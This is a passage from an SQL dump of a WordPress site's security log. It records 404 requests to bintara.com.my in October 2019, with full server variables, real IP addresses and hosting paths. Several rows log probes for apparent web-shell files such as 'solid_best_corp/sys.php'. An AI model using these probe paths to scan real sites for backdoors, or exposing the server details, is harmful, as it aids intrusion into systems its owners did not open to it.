deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:122:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"54247\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaglYjaIzmjKT0uBEUqUuQAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571300706.1958\";s:12:\"REQUEST_TIME\";s:10:\"1571300706\";}}','notice','2019-10-17 08:25:08','2019-10-17 08:25:06',35414736,37223848,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28205,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"54858\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaglaASv6QovRW0DK2k18wAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571300712.5823\";s:12:\"REQUEST_TIME\";s:10:\"1571300712\";}}','notice','2019-10-17 08:25:14','2019-10-17 08:25:12',35026008,36840696,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28206,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/2019/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/2019/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XagqKTaIzmjKT0uBEUqYpQAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/2019/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagqKTaIzmjKT0uBEUqYpQAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.77.211\";s:11:\"REMOTE_PORT\";s:5:\"49659\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:48:\"/2019/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XagqKTaIzmjKT0uBEUqYpQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571301929.9036\";s:12:\"REQUEST_TIME\";s:10:\"1571301929\";}}','notice','2019-10-17 08:45:33','2019-10-17 08:45:30',35662160,37464272,'https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/sys.php',1,0,'37.187.77.211'),(28207,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/2019/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/2019/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XagqRASv6QovRW0DK2k3fAAAAMU\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/2019/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagqRASv6QovRW0DK2k3fAAAAMU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.77.211\";s:11:\"REMOTE_PORT\";s:5:\"53256\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/2019/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XagqRASv6QovRW0DK2k3fAAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571301956.5147\";s:12:\"REQUEST_TIME\";s:10:\"1571301956\";}}','notice','2019-10-17 08:45:58','2019-10-17 08:45:56',35042944,36848824,'https://bintara.com.my/2019/wp-content/plugins/solid_best_corp/info.php',1,0,'37.187.77.211'),(28208,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/news/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/news/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/news/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XagtCDaIzmjKT0uBEUqadAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/news/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/news/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagtCDaIzmjKT0uBEUqadAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"31.211.86.13\";s:11:\"REMOTE_PORT\";s:5:\"39726\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/news/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:48:\"/news/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XagtCDaIzmjKT0uBEUqadAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571302664.796\";s:12:\"REQUEST_TIME\";s:10:\"1571302664\";}}','notice','2019-10-17 08:57:47','2019-10-17 08:57:45',35663128,37465648,'https://bintara.com.my/news/wp-content/plugins/solid_best_corp/sys.php',1,0,'31.211.86.13'),(28209,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/news/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/news/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/news/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XagtCzaIzmjKT0uBEUqadwAAAAI\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/news/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/news/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagtCzaIzmjKT0uBEUqadwAAAAI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"31.211.86.13\";s:11:\"REMOTE_PORT\";s:5:\"40052\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/news/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/news/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XagtCzaIzmjKT0uBEUqadwAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571302668.0571\";s:12:\"REQUEST_TIME\";s:10:\"1571302668\";}}','notice','2019-10-17 08:57:49','2019-10-17 08:57:48',35047200,36845808,'https://bintara.com.my/news/wp-content/plugins/solid_best_corp/info.php',1,0,'31.211.86.13'),(28210,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:46:\"/v1/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/v1/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xag7CASv6QovRW0DK2k9RQAAAM0\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/v1/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xag7CASv6QovRW0DK2k9RQAAAM0\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"34088\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:46:\"/v1/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xag7CASv6QovRW0DK2k9RQAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571306248.1502\";s:12:\"REQUEST_TIME\";s:10:\"1571306248\";}}','notice','2019-10-17 09:57:30','2019-10-17 09:57:28',35662536,37464376,'https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/sys.php',1,0,'104.238.97.201'),(28211,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/v1/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/v1/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xag7UTaIzmjKT0uBEUqldwAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/v1/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xag7UTaIzmjKT0uBEUqldwAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"44492\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:47:\"/v1/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xag7UTaIzmjKT0uBEUqldwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571306322.052\";s:12:\"REQUEST_TIME\";s:10:\"1571306322\";}}','notice','2019-10-17 09:58:43','2019-10-17 09:58:42',35039600,36839864,'https://bintara.com.my/v1/wp-content/plugins/solid_best_corp/info.php',1,0,'104.238.97.201'),(28212,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; 